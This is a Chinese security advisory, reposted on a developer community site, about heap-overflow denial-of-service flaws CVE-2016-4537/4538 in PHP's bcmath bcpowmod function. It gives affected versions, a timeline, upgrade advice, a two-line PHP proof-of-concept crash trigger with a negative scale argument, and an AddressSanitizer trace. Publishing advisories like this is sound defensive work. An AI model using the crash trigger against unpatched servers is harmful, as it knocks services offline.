PHP DoS漏洞再现 虽然利用难度较高 绿盟科技发出分析和防护方案-阿里云开发者社区

开发者社区> 晚来风急> 正文

PHP DoS漏洞再现 虽然利用难度较高 绿盟科技发出分析和防护方案

简介:
+关注继续查看

www.securityfocus.com 网站发出公告称,PHP中用于二进制计算的模块“bcmath.c”存在多个本地堆溢出漏洞,该漏洞有可能导致 DoS攻击。漏洞CVE编号分别为:CVE-2016-4537和CVE-2016-4538。绿盟科技将此漏洞级别定为 中,意味着影响范围可控,危害程度可控,利用难度较高。

QQ%E6%88%AA%E5%9B%BE20160909144223.png

PHP bcmath.c 漏洞危害及影响

CVE-2016-4537漏洞存在于ext/bcmath/bcmath.c库中的bcpowmod函数中,攻击者可以在远程调用该函数的时候故意传入一个负整数参数,从而导致拒绝服务或者其他尚未明确的影响。

CVE-2016-4538漏洞存在于ext/bcmath/bcmath.c库中的bcpowmod函数中,该函数在对特定数据结构做修改的时候未对相应变量进行校验,可以导致攻击者使用精心构造的代码实施拒绝服务攻击或者其他尚未明确的影响。

但绿盟科技安全团队表示

因为漏洞为本地漏洞,不能远程利用,同时不是所有的PHP在编译的时候包含此模块,也不是所有的网站都会用到。

影响的版本

  • PHP版本 < 5.5.35
  • PHP版本 5.6.x < 5.6.21
  • PHP版本 7.x < 7.0.6

不受影响的版本

  • PHP版本 >= 5.5.35
  • PHP版本 5.6.x >= 5.6.21
  • PHP版本 7.x >= 7.0.6

PHP bcmath.c 漏洞发展情况

  1. 2016年4月24日,NULL-LIFE团队的Fernando向PHP官方提交了 PHP“bcmath.c”库中的本地堆溢出漏洞 。具体地址如下:
  2. 2016年4月25日, 官方进行了代码修复 
  3. 2016年8月18日,官方发布了修复漏洞后的最新版本。
  4. 2016年9月9日,绿盟科技安全团队发现www.securityfocus.com 网站对PHP“bcmath.c”多个本地堆溢出漏洞做了更新,其中涉及到的CVE编号分别为:CVE-2016-4537和CVE-2016-4538。

PHP bcmath.c 漏洞防护方案

  • 如果所使用的PHP为受影响的版本,请尽快升级到不受影响的PHP版本。 官方升级地址
  • 使用绿盟科技的远程评估系统(RSAS)对系统进行安全评估。
  • 短期服务:绿盟科技工程师现场处理。确保第一时间消除网络内相关风险点,控制事件影响范围,提供事件分析报告。
  • 中期服务:提供 3-6个月的风险监控与巡检服务。根除风险,确保事件不复发。
  • 长期服务:基于行业业务风险解决方案(威胁情报+攻击溯源+专业安全服务)

PHP bcmath.c是什么

为PHP提供的任意精度数学二进制计算器,该计算器支持的任何大小和精度的数字计算,表示为字符串。

bc是Binary Calculator的缩写。bc*函数的参数都是操作数加上一个可选的 [int scale],比如string bcadd(string $left_operand, string $right_operand[, int $scale]),如果scale没有提供,就用bcscale的缺省值。这里大数直接用一个由0-9组成的string表示,计算结果返回的也是一个 string。

PHP bcmath.c漏洞分析

漏洞的成因是由于文件ext/bcmath/bcmath.c中的bcpowmod函数在接受参数时没有做准确的参数校验,当向参数scale传入一个负数时,有可能造成拒绝服务或者其他未明确的影响。

造成此漏洞的函数是bcpowmod,其声明如下:

bcpowmod.png

该函数的作用是求幂取模,例如下面代码,功能是对x求y次幂,然后求mod的模。

<?php 
$a = bcpowmod($x, $y, $mod); 
?>

第4个参数scale是一个可选参数,当前面参数有小数时,用于指定小数点之后要显示的位数。然而当scale传入的是负数时,可能造成堆溢出引发拒绝服务。

下面是该漏洞的POC:

<?php 
bcpowmod(1, "A", 128, -200);   // 造成堆溢出 
bcpowmod(1, 1.2, 1, 1);    // 后续再次调用此函数时,由于堆结构已被破坏,造成程序崩溃 
?>

程序崩溃时的调用堆栈如下:

AddressSanitizer: heap-buffer-overflow on address 0xb3805f68 at pc 0x083fd271 bp 0xbf91e4d8 sp 0xbf91e4c8 
READ of size 1 at 0xb3805f68 thread T0 
#0 0x83fd270 in bc_divide /home/fmunozs/phpgit/php56/ext/bcmath/libbcmath/src/div.c:122 
#1 0x83fff96 in bc_raisemod /home/fmunozs/phpgit/php56/ext/bcmath/libbcmath/src/raisemod.c:69 
#2 0x83f9923 in zif_bcpowmod /home/fmunozs/phpgit/php56/ext/bcmath/bcmath.c:426 
#3 0x9a7c718 in zend_do_fcall_common_helper_SPEC /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:558 
#4 0x9640316 in execute_ex /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:363 
#5 0x9a6c9c8 in zend_execute /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:388 
#6 0x9470b59 in zend_execute_scripts /home/fmunozs/phpgit/php56/Zend/zend.c:1341 
#7 0x91acc6b in php_execute_script /home/fmunozs/phpgit/php56/main/main.c:2613 
#8 0x9a8648a in do_cli /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:994 
#9 0x808a502 in main /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:1378 
#10 0xb6dbe645 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18645) 
#11 0x808aaba  (/home/fmunozs/phpgit/php56/sapi/cli/php+0x808aaba)

AddressSanitizer: heap-buffer-overflow /home/fmunozs/phpgit/php56/ext/bcmath/libbcmath/src/div.c:122 bc_divide 
Shadow bytes around the buggy address: 
0x36700b90: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 
0x36700ba0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 
0x36700bb0: fa fa fd fa fa fa 00 00 fa fa fd fa fa fa fd fa 
0x36700bc0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 
0x36700bd0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 
=> 0x36700be0: fa fa fd fa fa fa fd fa fa fa fd fa fa[fa]fd fa 
0x36700bf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 
0x36700c00: fa fa 01 fa fa fa 01 fa fa fa 01 fa fa fa 00 06 
0x36700c10: fa fa 00 03 fa fa 00 05 fa fa 00 06 fa fa 00 07 
0x36700c20: fa fa 00 00 fa fa 00 07 fa fa 00 00 fa fa 00 05 
0x36700c30: fa fa 00 07 fa fa 00 07 fa fa 00 00 fa fa 00 00

PHP官方对此漏洞的修复如下,在ext/bcmath/bcmath.c文件中引入了一个新的校验函数split_bc_num,并在bcpowmod函数中通过split_bc_num加强了对scale参数的校验。

scalexxx.png

绿盟科技威胁预警认为该漏洞较难利用

中级:影响范围可控,危害程度可控,利用难度较高,7*8小时内部应急跟踪,72小时内完成技术分析、产品升级和防护方案。

绿盟科技威胁事件定级标准

级别

描述

影响范围比较广,危害严重,利用难度较低,7*24小时内部应急跟踪,24小时内完成技术分析、产品升级和防护方案。

影响范围可控,危害程度可控,利用难度较高,7*8小时内部应急跟踪,72小时内完成技术分析、产品升级和防护方案。

影响较小,危害程度较小。

声 明

本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告,必须保证此安全公告的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全公告内容,不得以任何方式将其用于商业目的。



原文发布时间:2017年3月24日

本文由:绿盟科技 发布,版权归属于原作者

原文链接:http://toutiao.secjia.com/php-ddos-vulnerability-cve-2016-4537-4538#

本文来自云栖社区合作伙伴安全加,了解相关信息可以关注安全加网站

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
一致性哈希算法的php实现与分析-算法
<?php/** 一致性哈希算法* 过程:* 1,抽象一个圆,然后把服务器节点按一定算法得到整数有序顺时针放到圆上,圆环用2^32 个点来进行均匀切割。* hash函数的结果应该均匀分布在[0,2^32-1]区间* 2,由于服务器少,在圆上分布不均匀会造成数据倾斜,所以我们使用虚拟节点代替服务器的节点,一个服务器生成32个虚拟节点,或者更多。
1361 0
《Spark与Hadoop大数据分析》——1.1 大数据分析以及 Hadoop 和 Spark 在其中承担的角色
本节书摘来自华章计算机《Spark与Hadoop大数据分析》一书中的第1章,第1.1节,作者 [美]文卡特·安卡姆(Venkat Ankam),译 吴今朝,更多章节内容可以访问云栖社区“华章计算机”公众号查看。
1207 0
+关注
9380
文章
243
问答
文章排行榜
最热
最新
相关电子书
更多
文娱运维技术
立即下载
《SaaS模式云原生数据仓库应用场景实践》
立即下载
《看见新力量:二》电子书
立即下载